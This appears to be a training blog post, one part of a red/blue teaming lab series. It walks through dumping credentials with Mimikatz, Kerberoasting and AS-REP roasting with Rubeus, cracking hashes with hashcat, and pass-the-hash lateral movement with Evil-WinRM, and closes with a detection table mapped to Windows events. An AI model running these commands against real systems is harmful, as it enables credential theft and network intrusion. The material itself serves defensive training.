Part 4: Credential Access with Mimikatz & Rubeus and Lateral Movement with Evil-WinRM
We’ll pivot to credential access and abuse techniques in this fourth installment of our red teaming blog series. So far, we have established a foothold on our lab workstation test001 (user John) via a Covenant C2 Grunt agent. With that access (and elevated privileges from the last part), we will dump credentials from memory using Mimikatz, perform Kerberos ticket attacks with Rubeus, and crack passwords on our attacker machine. Finally, using a pass-the-hash technique, we’ll use the stolen credentials to move laterally to another host (e.g. test002) via Evil-WinRM (Windows Remote Management).
Lab Environment Recap
| Component | Detail |
| Attacker | Commando VM (Windows 10) |
| C2 Framework | Covenant |
| Victim Machine | test001 (user: John) |
| Target Machine | test002 |
| Domain | LAB |
Dumping Credentials with Mimikatz
Step-by-Step:
- Launch Mimikatz in Covenant
- Task > Select Grunt on test001 > Run:
sekurlsa::logonPasswords
- Expected Output:
| Field | Value |
| Username | John |
| Domain | LAB |
| NTLM Hash | 5f8901d3e9c8d6f8e7ac… |
| Clear-text | (null) |
- Store the NTLM Hash
- Save for pass-the-hash later or attempt to crack offline.
Abusing Kerberos with Rubeus
Kerberoasting
- Command:
Rubeus.exe kerberoast /outfile:C:\Temp\kerberoast.txt /format:hashcat
- Sample Output:
$krb5tgs$23$*svc-db$LAB.LOCAL$SQLService/…*
- Purpose: Crackable offline, reveals service account password.
AS-REP Roasting
- Command:
Rubeus.exe asreproast /user:svc-backup /outfile: C:\Temp\asrep.txt /format:hashcat
- Sample Output:
$krb5asrep$23$svc-backup@LAB.LOCAL:…
Cracking Hashes on Commando VM
| Hash Type | Hashcat Mode | Example Command |
| NTLM (John) | 1000 | hashcat -m 1000 john_hash.txt wordlist.txt |
| Kerberoast (RC4) | 13100 | hashcat -m 13100 kerberoast.txt wordlist.txt |
| AS-REP (RC4) | 18200 | hashcat -m 18200 asrep.txt wordlist.txt |
Lateral Movement with Evil-WinRM
Command:
evil-winrm -i test002 -u “John” -H 5F8901D3E9C8D6F8E7AC25B2CF9C3D92
What You Should See:
John@test002 C:\Users\John>
Above is a sample screenshot of EVIL-WINRM
Blue Team Detection Summary
| Action | Windows Event | Defender Detection | Sentinel Hint |
| Mimikatz | 4688 (process) | Credential theft behavior | Process cmdline contains mimikatz strings |
| Kerberoasting | 4769 | Unusual TGS requests | High SPN request count per user |
| AS-REP Roasting | 4768 | Auth w/o pre-auth | PreAuthType = 0 in logs |
| Scheduled Tasks | 4698 | Persistence alert | New task creation by unusual account |
| Evil-WinRM (PTH) | 4624, 4648 | NTLM PTH attempt | NTLM logon instead of Kerberos |
Recap
- Dumped credentials with Mimikatz
- Extracted service account hashes using Rubeus
- Cracked hashes using Hashcat
- Moved laterally with Evil-WinRM using NTLM hashes
- Detected it all using Windows logs, Defender, and Sentinel
This lab is part of our ongoing training series based on the book:
Red Teaming and Blue Teaming with Microsoft Defender XDR
Stay tuned for the next part – we’ll dive into persistence at scale and evasion tactics to test your defenses further!
Thanks,
John Sr.
